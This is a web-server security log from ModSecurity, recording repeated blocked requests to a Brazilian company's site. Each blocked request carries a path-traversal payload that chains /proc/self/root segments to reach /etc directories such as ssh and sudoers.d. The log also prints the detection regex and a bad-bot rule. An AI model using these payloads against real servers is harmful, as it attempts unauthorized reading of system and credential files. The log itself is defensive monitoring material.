[Tue Mar 17 09:26:27.206111 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.46:46250] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIc6BJNF7axNlVR0X7-QAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:29.770923 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.243.203:58780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIdZqmL8PQht4WJFlHHwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:26:32.721754 2026] [:error] [pid 1731:tid 140411582465792] [client 74.7.241.46:35748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIeAb2qCuy5irgBMjInwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:34.525987 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.243.203:42828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIepDEJR9VXonE_-1ObQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:26:37.318844 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.241.46:35762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIfP0Bec_B9OkZP_i8SAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:43.246879 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.241.46:57360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIg5qmL8PQht4WJFlHJQAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:46.659588 2026] [:error] [pid 2553:tid 140411725141760] [client 74.7.241.46:57376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIhv0Bec_B9OkZP_i8SwAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:55.084506 2026] [:error] [pid 2159:tid 140411641214720] [client 74.7.243.203:42836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIj_ct6CQ8jnRyg2p7oAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:26:56.374898 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:42486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIkKBJNF7axNlVR0X8AQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:57.719554 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:42496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIkQeiSKl8TjouI-YBtwAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:27:05.037131 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.241.46:57380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablImQb2qCuy5irgBMjIsAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:26.106119 2026] [:error] [pid 2159:tid 140411708356352] [client 74.7.241.46:38010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIrvct6CQ8jnRyg2p7ugAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:27.929666 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.241.46:53562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIr5qmL8PQht4WJFlHNAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:31.358733 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.241.46:38334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIs6BJNF7axNlVR0X8DgAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:39.312700 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:38340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIu5qmL8PQht4WJFlHPQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:40.675085 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:35584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIvAeiSKl8TjouI-YByQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:27:55.148186 2026] [:error] [pid 2159:tid 140411616036608] [client 74.7.241.46:35592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIy_ct6CQ8jnRyg2p7zQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:27:57.666810 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.241.46:52900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIzQb2qCuy5irgBMjIywAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:28:04.327138 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:42506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI1O82sZHvlq4xgHrCEwAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:28:17.508081 2026] [:error] [pid 2553:tid 140411658000128] [client 74.7.244.31:41956] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablI4f0Bec_B9OkZP_i8egAAAso"]
[Tue Mar 17 09:28:19.276606 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:49128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI45qmL8PQht4WJFlHYAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:28:21.755062 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.241.46:38478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI5ZDEJR9VXonE_-1OmAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
